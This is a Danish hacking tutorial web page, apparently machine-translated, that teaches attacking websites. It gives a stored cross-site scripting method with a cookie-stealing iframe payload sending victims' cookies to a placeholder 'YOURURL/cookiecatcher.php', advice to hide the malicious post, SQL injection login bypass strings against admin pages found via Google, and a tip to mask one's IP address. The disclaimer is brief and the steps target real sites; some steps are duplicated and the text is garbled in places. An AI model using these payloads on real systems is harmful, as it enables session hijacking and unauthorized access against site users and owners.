HodTari.com

Sådan Hack en hjemmeside

OBS: Denne vejledning er udelukkende beregnet til uddannelsesmæssige formål, uanset om du vil hjælpe folk med at lære "whitehat hacks" eller at se hvordan hackere arbejder for bedre at beskytte deres egne hjemmesider. Denne vejledning giver dig mulighed for at få adgang til forskellige LOW sikkerhedsniveauer.

trin

Metode 1
Brug af "Cross Site Scripting"

  1. 1
    Find et sårbart websted, hvor du kan indsende indhold. Et forum er et godt eksempel. Husk, at hvis dit websted er sikkert, virker denne metode ikke.
  2. 2
    Opret et indlæg. Du bliver nødt til at indtaste en særlig kode for "posten", der vil fange dataene for alle, der klikker på den.
    • Du vil gerne teste for at se, om systemet giver dig mulighed for at offentliggøre koder, eller hvis du filtrerer dem. Indtast advarsel ("test") (fjernelse af "..."). Hvis der vises en advarselsboks, når du klikker på dit indlæg, er webstedet sårbart over for angreb.
  3. 3
    Find et sårbart websted, hvor du kan indsende indhold. Et forum er et godt eksempel. Husk, at hvis dit websted er sikkert, virker denne metode ikke.
  4. 4
    Opret et indlæg. Du bliver nødt til at indtaste en særlig kode for "posten", der vil fange dataene for alle, der klikker på den.
    • Du vil gerne teste for at se, om systemet giver dig mulighed for at offentliggøre koder, eller hvis du filtrerer dem. Indtast advarsel ("test") (fjernelse af "..."). Hvis der vises en advarselsboks, når du klikker på dit indlæg, er webstedet sårbart over for angreb.
  5. 5
    Opret og send din cookie catcher. Formålet med dette angreb er at indfange en brugers cookies, som giver dig adgang til din konto på dette websted med login sårbarhed. Du skal bruge en "cookie catcher", som vil fange dit måls cookies og omdirigere det. Upload cookie catcher på et websted, der har adgang og support til PHP. Søg efter eksempler på cookie catcher på internettet.
  6. 6
    Lav et indlæg med din "cookie catcher" script. Indtast en passende kode, der vil fange cookies og sende dem til dit websted. Du bør lægge nogle tekst efter koden for at skjule dit indlæg og forhindre det i at blive slettet.
    • Et eksempel kode ville se sådan ud <...iframe... frameborder= 0 height=0 width=0 src=jаvascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(fjernelse af "...").
  7. 7
    Brug de indsamlede cookies. Derefter kan du bruge cookieoplysningerne, som skal gemmes på dit websted, til ethvert formål, du har brug for.

Metode 2
Udfører en "Injection Attack"

  1. 1
    Find et sårbart websted. Du bliver nødt til at finde et sårbart websted, der har et administrator login, der er let tilgængeligt. Søg Google for "admin login.asp".
  2. 2


    Log ind som administrator. Indtast admin som brugernavn og brug nogle koder kendt som adgangskoden. De mest almindelige er 1 `eller` 1 `=` 1.
  3. 3
    Tålmodighed. Denne metode kræver lidt forsøg og fejl.
  4. 4
    Få adgang til webstedet. Til sidst finder du den sekvens, der giver administrator adgang til webstedet (hvis det er et websted, der er sårbart for angreb).

Metode 3
Forberedelse til succes

  1. 1
    Lær et eller to programmeringssprog. Hvis du virkelig vil lære at hakse websteder, skal du forstå, hvordan computere og andre teknologier fungerer. Lær at bruge programmeringssprog som Python eller SQL, så du bedre kan styre computere og identificere sårbarheder i systemer.
  2. 2
    Kend HTML programmering. Du skal også have et godt kendskab til HTML og jаvascript til hackwebsteder. Det tager lidt tid at lære, men der er mange gratis måder at lære HTML gratis på internettet.
  3. 3
    Kig efter hvidhatte. "Whitehats" er hackere brugt til gode, udsætter sikkerhedssårbarheder og gør internettet til et bedre sted for alle. Hvis du vil lære at hacke, bruge denne viden og bruge din viden til godt, eller hvis du vil beskytte din egen hjemmeside, kan du kontakte hackerehattene til rådgivning.
  4. 4
    Søg intensivt. Hvis du lærer at hæve eller bare beskytte dig selv, skal du gøre en masse forskning. Der er mange forskellige former for sårbarheder, og denne liste ændres altid, så du skal altid fortsætte med at lære.
  5. 5
    Bliv aktuel. Da listen over mulige hacks konstant ændrer sig, skal du holde dig opdateret hele tiden. Bare fordi du er beskyttet for et bestemt hack i dag betyder det ikke, at du vil være sikker i fremtiden!

tips

  • Besøg hackerfora for at lære mange nyttige tips.

advarsler

  • Hacking er ulovlig. Hvis du er fanget, er det din skyld.
  • Hvis du prøver at hacke i den virkelige verden, blander du din IP-adresse ved hjælp af software, der er tilgængelig online.
  • Hvis du læser denne artikel, bliver du ikke straks en hacker. Du skal udforske dine færdigheder og øve dig meget.
Del på sociale netværk:

Relaterede
© 2024 HodTari.com